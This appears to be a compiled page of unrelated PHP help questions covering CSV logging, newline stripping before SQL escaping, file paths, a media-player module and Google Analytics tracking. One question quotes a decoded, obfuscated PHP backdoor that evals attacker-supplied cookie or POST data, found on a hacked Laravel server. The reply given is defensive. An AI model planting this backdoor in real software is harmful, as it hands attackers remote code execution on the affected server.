I have a log routine on my PHP website, that puts data on daily CSV files. Here's the code:
public function generateLogPMWeb($action){
session_start('usuario');
$head_data = "HOSPEDE_CODIGO" . ";" . "RESERVA_CODIGO" . ";" . "HOSPEDE_NOME" . ";" . "HOSPEDE_SOBRENOME" . ";" . "HOSPEDE_EMAIL" . ";" . "RESERVA_DESCRICAOSISTEMA" . ";" . "RESERVA_CODIGOLOCALIZADOR" . ";" . "RESERVA_CODIGOHOTEL" . ";" . "RESERVA_DATARESERVA" . ";" . "RESERVA_DATACHECKIN" . ";" . "RESERVA_DATACHECKOUT" . ";" . "ACAO" . ";\n";
file_put_contents(Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv', $head_data, FILE_APPEND); // MUDAR AQUI
$logPMWeb = $_SESSION['usuario']['id'] . ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_SESSION['usuario']['nome'] . ";" . $_SESSION['usuario']['sobrenome'] . ";" . $_SESSION['usuario']['email'] . ";" . "IC"
. ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_POST['idHotel'] . ";" . date('Y-m-d H:i:s') . ";" . $_SESSION['buscaReserva']['dataInicio'] . ";" . $_SESSION['buscaReserva']['dataFim']
. ";" . preg_replace('/^\s+|\n|\r|\s+$/m', '', $action) . ";\n";
//Save string to log, use FILE_APPEND to append.
file_put_contents(Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv', $logPMWeb, FILE_APPEND);
}
However I'm getting repeated header lines on my CSV files. I need to have the header only on the first line of the file.
What's the best thing to do?
Use file_exists like below... http://php.net/manual/en/function.file-exists.php
public function generateLogPMWeb($action){
session_start('usuario');
$logfile = Config::retorna("document_root", "root").'/logPMWeb/logPMWeb_'.date("Ymd").'.csv'
$head_data = "HOSPEDE_CODIGO" . ";" . "RESERVA_CODIGO" . ";" . "HOSPEDE_NOME" . ";" . "HOSPEDE_SOBRENOME" . ";" . "HOSPEDE_EMAIL" . ";" . "RESERVA_DESCRICAOSISTEMA" . ";" . "RESERVA_CODIGOLOCALIZADOR" . ";" . "RESERVA_CODIGOHOTEL" . ";" . "RESERVA_DATARESERVA" . ";" . "RESERVA_DATACHECKIN" . ";" . "RESERVA_DATACHECKOUT" . ";" . "ACAO" . ";\n";
if (!file_exists($logfile)) {
file_put_contents($logfile, $head_data, FILE_APPEND); // MUDAR AQUI
}
$logPMWeb = $_SESSION['usuario']['id'] . ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_SESSION['usuario']['nome'] . ";" . $_SESSION['usuario']['sobrenome'] . ";" . $_SESSION['usuario']['email'] . ";" . "IC"
. ";" . date('YmdHis') . "_" . $_POST['idHotel'] . "_" . $_SESSION['usuario']['id'] . ";" . $_POST['idHotel'] . ";" . date('Y-m-d H:i:s') . ";" . $_SESSION['buscaReserva']['dataInicio'] . ";" . $_SESSION['buscaReserva']['dataFim']
. ";" . preg_replace('/^\s+|\n|\r|\s+$/m', '', $action) . ";\n";
//Save string to log, use FILE_APPEND to append.
file_put_contents($logfile, $logPMWeb, FILE_APPEND);
}
Related
I have following string (using $_POST), how to remove all the new line, spaces and make it as a absolute single line?
Physical Address. . . . . . . . . : E8-6A-64-DE-48-60
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8F
Physical Address. . . . . . . . . : 06-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-92
Not always stable?
$request= mysql_real_escape_string(trim($_POST['request']));
$request_sql =str_replace("\r\n",'', $request);
$request_sql = str_replace("\\r\\n",'', $request_sql);
echo $request_sql;
trim only strips spaces at end and start of the string and you should strip \r and \n individually.
try this:
$request= mysql_real_escape_string($_POST['request']);
$request_sql =str_replace("\n",'', $request);
$request_sql = str_replace("\r",'', $request_sql);
$request_sql = str_replace(" ",'', $request_sql);
echo $request_sql;
Try using regex.
$request = $_POST['request'];
//Remove all characters that are not A-Z, a-z, 0-9 or '.', ':' or '-'
$request_sql = preg_replace("/[^A-Za-z0-9.:-]/", '', $request );
try:
$str = 'Physical Address. . . . . . . . . : E8-6A-64-DE-48-60
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8F
Physical Address. . . . . . . . . : 06-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-8E
Physical Address. . . . . . . . . : 04-EA-56-08-E6-92';
echo str_replace(" \n", '', $str);
Output:
Physical Address. . . . . . . . . : E8-6A-64-DE-48-60Physical Address. . . . . . . . . : 04-EA-56-08-E6-8FPhysical Address. . . . . . . . . : 06-EA-56-08-E6-8EPhysical Address. . . . . . . . . : 04-EA-56-08-E6-8EPhysical Address. . . . . . . . . : 04-EA-56-08-E6-92
After replacing the \n you can use mysql escape string to avoid sql injection.
The problem with your code is that mysql_real_escape_string will not only escape ' and " but it will escape other characters like \n and \r which you want to remove.
It will replace new line characters with a backslash character followed by l characters
so removing newlines, carriage return after they have been escaped will result in a string with extra backslashes \ and n and r characters.
Check out this
<?php
$originalString =
"Line1
Line2
";
// CASE 1 WRONG RESULT
$string1 = mysqli_real_escape_string($con, $originalString);
$string1 = str_replace("\n", '', $string1);
echo "escape then replace result \n";
echo $string1 . "\n";
//CASE 2 EXPECTED RESULT
$string2 = str_replace("\n", '', $originalString);
$string2 = mysqli_real_escape_string($con, $string2);
echo "replace then escape result \n";
echo $string2 . "\n";
this will output
escape then replace result
Line1\nLine2\n
replace then escape result
Line1Line2
So to correct your code
$request_sql =str_replace(["\n", "\r", " "],'', $_POST['request']);
$request= mysql_real_escape_string($request_sql);
echo $request_sql;
Please don't use mysql_real_escape_string , instead use prepared statements, here an answer for how to switch to them, they will make your life much more easier and safer.
For a customer I am maintaining a small group of websites built in PHP Laravel. Lately while working on these I have discovered a couple of new suspicious looking files, which suddenly appeared on two of the websites FTP servers. The files are not originally a part of the codebase, and I have no idea where they're coming from all of a sudden. There are three files in total, named b3lo5x3x.php, cache.php and plugin.php and they are located in the root directory of the websites.
The content of the files looks pretty disturbing. When decoded on unphp.net I get the following result, which is the exact same for all three files. The size of all three files are also the same.
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
function dgubnv($fvgiv, $lfpfzw, $nclll) {
return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
}
function oocfo($fvgiv, $elasr) {
return #$fvgiv[9]($fvgiv[1], $elasr);
}
function yiugt($fvgiv, $elasr) {
$vezpr = $fvgiv[3]($elasr) % 3;
if (!$vezpr) {
eval($elasr[1]($elasr[2]));
exit();
}
}
$wqudv = oocfo($fvgiv, $wqudv);
yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?
Wipe the machines affected completely. You need to reinstall the Laravel project(s) to a new clean machine. You also should audit them and any other software used if possible.
Make sure that all of the software on the server is updated too. Most likely you were compromised through a non updated software with a known vulnerability.
Few examples I've tried
// Worked
fopen($OutputFolderPath."Text.pdf", "w");
// Didn't work
$pdf->Output($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
// Works with no PDF content inside
fopen($OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf','F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','w');
// Worked
$pdf->Output('C:/ISOSEC/PDFS/' . ReplaceWindowsFileNameSpecialCharacters($Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . '_' . $Mother->PatientTableRecord['NHSID'] . ' ' . date('d_m_Y') . '.pdf'),'F'); // $OutputFolderPath . $Mother->PatientTableRecord['Forename'] . ' ' . $Mother->PatientTableRecord['Surname'] . ' ' . date('d_m_Y h_i_s', time()) . '.pdf','F'
I'm trying to use the $OutputFolderPath
'$OutputFolderPath' Path:
//MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/
Error:
fopen(file:////MIA-Test/htdocs/SharedFolder/MIA - Digital Post Natal Records/Fiona Appleton_1946546288 09_06_2015.pdf): failed to open stream: No such file or directory
Use this :
$a = file_get_contents('Text.pdf');
file_put_contents('new_text.pdf', $a);
I'm fighting with this module since yesterday. Documentation is poor or there is something I am doing wrong.
This is the link from the original html files.
www.bestbuildpc.org/Html5_Player/index.html
This is the link for the documentation
www.bestbuildpc.org/Html5_Player/readme/index.html
I converted to a module in order to work in Ravennuke(based on phpnuke)
This is the link where the module is not loading properly.
http://www.bestbuildpc.org/modules.php?name=HTML5_Player
<?php
if (!defined('MODULE_FILE')) die('You can\'t access this file directly...');
if (!defined('PHP_EOL')) define('PHP_EOL', strtoupper(substr(PHP_OS,0,3) == 'WIN') ? "\r\n" : "\n");
require_once 'mainfile.php';
$module_name = basename(dirname(__FILE__));
$pagetitle = '- ' . $module_name . '';
$index = 0;
if (!defined('INDEX_FILE')) define('INDEX_FILE', true); // Set to FALSE to hide right blocks
if (defined('INDEX_FILE') AND INDEX_FILE === true) {
// auto set right blocks for pre patch 3.1 compatibility
$index = 1;
}
$ThemeSel = get_theme(true);
$html5player = 'themes/' . $ThemeSel . '/css/normalize.css';
if (file_exists($html5player)) {
define('RN_MODULE_CSS', 'normalize.css');
} else {
$html5player = 'modules/' . $module_name . '/css/normalize.css';
addCSSToHead($html5player, 'file');
addCSSToHead('modules/' . $module_name . '/mediaelement/mediaelementplayer.min.css', 'file');
// addJSToHead('modules/' . $module_name . '/js/jquery-1.11.1.min.js', 'file');//I have another version loading
//echo '<script type="text/javascript">!window.jQuery && document.write(\'<script src="modules/HTML5_Player/js/jquery-1.11.1.min.js"><\/script>\')</script>' . PHP_EOL;
//echo '<script type="text/javascript">window.jQuery && document.write(\'<script src="includes/jquery/jquery.js"><\/script>\')</script>' . PHP_EOL;
addJSToBody('modules/' . $module_name . '/mediaelement/mediaelement-and-player.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery-ui-1.11.1.sortable.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.ui.touch-punch-improved.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.hammer-full.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/perfect-scrollbar-with-mousewheel.min.js', 'file');
addJSToBody('modules/' . $module_name . '/js/jquery.vimuse.min.js', 'file');
$JStoHeadHTML = '
<script type="text/javascript">' . PHP_EOL
// . '$(window).load(function(){' . PHP_EOL
. '$(document).ready(function(){' . PHP_EOL
. '$(\'#player\').vimuse()({' . PHP_EOL
. 'mediaType: \'audio\',' . PHP_EOL
. 'showPlaylistOnLoad: true,' . PHP_EOL
. 'autoplay: true,' . PHP_EOL
. 'shuffle: true,' . PHP_EOL
. 'showPlaylistOnLoad: true,' . PHP_EOL
. 'playlistProgress: true,' . PHP_EOL
. 'showFileTypeIcons: true,' . PHP_EOL
. 'showDeleteButtons: true,' . PHP_EOL
. 'showItemDuration: true,' . PHP_EOL
. 'enablePlaylistSort: true,' . PHP_EOL
. 'showAudioDetails: true,' . PHP_EOL
. 'showAudioCover: true,' . PHP_EOL
. 'showAuxControls: true,' . PHP_EOL
. 'playlistProgress: true,' . PHP_EOL
. 'stopPlaybackOnPageHide: false,' . PHP_EOL
. 'showDownloadLinks: false,' . PHP_EOL
. 'scanMP3Folder: true,' . PHP_EOL
. 'mp3Folder: \'media/audio\'' . PHP_EOL
. '});' . PHP_EOL
. '});' . PHP_EOL
. '</script>' . PHP_EOL;
addJSToBody($JStoHeadHTML, 'inline');
}
include_once 'header.php';
OpenTable();
echo '<div class="text-center">' , PHP_EOL
, '<div class="header-content">' , PHP_EOL
, '<h1>HTML5 Media Player</h1>' , PHP_EOL
, '</div></div>' , PHP_EOL
, '<div class="main">' , PHP_EOL
, '<div id="player">' , PHP_EOL
, '</div></div>' , PHP_EOL;
CloseTable();
include_once 'footer.php';
What am I doing wroong. The module is not working. I need example from the same files. I've been reading and testing lots of ways to load jquery but I don't get any more idea of what is going on. it will be nice if someone take a look at it. Thanks in advance.
I am using the following script to send data from a form to google analytics:
if ($result){
$var_utmac = 'UA-0000000-0';
$var_utmhn = 'my-site.com'; // domain
$var_utmn = rand(1000000000,9999999999); // random number
$var_cookie = rand(10000000,99999999); //random cookie number
$var_random = rand(1000000000,2147483647); //number under 2147483647
$var_today = time();
$var_referer = $_SERVER['HTTP_REFERER']; //referer url
if ($var_referer == '') { $var_referer = '-'; }
$var_uservar='-'; // no user-defined
$var_utmp= $_POST['REQUEST_URI'].'data_'. htmlentities($_POST['dataone']).'_'.htmlentities($_POST['datatwo']); // folder called no_jstracker to segment nojavascript visitors
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D_CAMPAIGN_%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D_KEYWORD_%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
echo ' <img src="' . $urchinUrl . '" border="0" />';
}
While the data is being sent successfully there is one issue and that is that analytics doesn't show some of the data correctly i.e. for campaign data ist just shoes "CAMPAIGN" for keyword it shows "KEYWORD". It is clear where this happens in the script but am not sure how to fix it. Ideally of course analytics should populate that with its own data.
Any suggestions whether this is even possible?
i think this is happen because you hard coded "CAMPAIGN" value. instead of that assign value for campaign.
$CAMPAIGN='facebook';
$KEYWORD='testing';
$urchinUrl='http://www.google-analytics.com/__utm.gif?utmwv=3&utmn=' . $var_utmn . '&utme=&utmcs=-&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=' . $var_utmhn . '&utmhid=' . $var_utmn . '&utmr=' . $var_referer . '&utmp=' . $var_utmp . '&utmac=' . $var_utmac . '&utmcc=__utma%3D' . $var_cookie . '.' . $var_random . '.' . $var_today . '.' . $var_today . '.' . $var_today . '.2%3B%2B__utmz%3D' . $var_cookie . '.' . $var_today . '.2.2.utmcsr%3D_SOURCE_%7Cutmccn%3D'.$CAMPAIGN.'%7Cutmcmd%3D_MEDIUM_%7Cutmctr%3D'.$KEYWORD.'%7Cutmcct%3D_CONTENT_%3B%2B__utmv%3D' . $var_cookie . '.' . $var_uservar . '%3B';
for more details about Google Analytics Cookies